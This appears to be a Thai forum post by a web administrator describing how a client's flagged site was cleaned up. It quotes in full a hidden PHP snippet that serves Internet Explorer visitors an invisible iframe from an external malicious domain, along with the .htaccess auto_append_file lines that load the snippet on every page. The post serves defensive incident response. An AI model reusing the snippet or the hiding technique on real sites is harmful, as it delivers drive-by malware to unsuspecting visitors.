เว็บลูกค้าเข้าด้วย Firefox ไม่ได้
" เว็บไซต์นี้อาจเป็นอันตราย! "
ซอฟต์แวร์ที่เป็นอันตรายถูกโฮสต์ไว้ในโดเมนจำนวน 1 โดเมนรวมทั้ง ด้วย
ผมละแปลกใจในเมื่อ มันเจอขนาดว่ารู้ชื่อ file google มันจะบอกอีกหน่อยก็ไม่ได้ว่า link มันอยู่ตรงไหน
จะได้หาง่าย ๆ หน่อย
เคสนี้ ไม่เหมือนที่เคยเจอ ที่มันจะแทรก script iFrame ใน file ประเภท html php แต่ไปอยู่ใน file .mcd
ซึ่ง ssh เข้าไปจะมองไม่เห็น
ตอนแรกใช้ FizScript ของน้อง Mean Scan หาหลายรอบไม่เจอ (เพราะว่าไม่ได้ scan file .mcd ด้วย )
ตอน Upload FizScaipt เข้าไปด้วย Winscp จึงเห็นว่าว่ามี file แปลก เลยลองเปิดดู
เจอ script แบบนี้
<?php $ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($ua,"msie")){
echo "<iframe src='http://ftjfjhrgerhtjhrt.bij.pl/ifr/' frameborder=0 height=1 width=1 scrolling=no></iframe>";
exit();
} ?>
ซึ่งมันจะถูกเรียกมาจาก .htaccess
<IfModule mod_php4.c>
AddType application/x-httpd-php .html .htm .shtml .phtml .php .asp
php_value auto_append_file .mcd
</IfModule>
<IfModule sapi_apache2.c>
AddType application/x-httpd-php .html .htm .shtml .phtml .php .asp
php_value auto_append_file .mcd
</IfModule>
<IfModule mod_php5.c>
AddType application/x-httpd-php .html .htm .shtml .phtml .php .asp
php_value auto_append_file .mcd
</IfModule>
ลบออก แล้วไปแจ้งที่ google webmastertool อีกที
เว็บลูกค้าไม่ได้ใช้ cms ไม่รู้ว่ามัน upload เข้ามายังไง Owner เป็น apache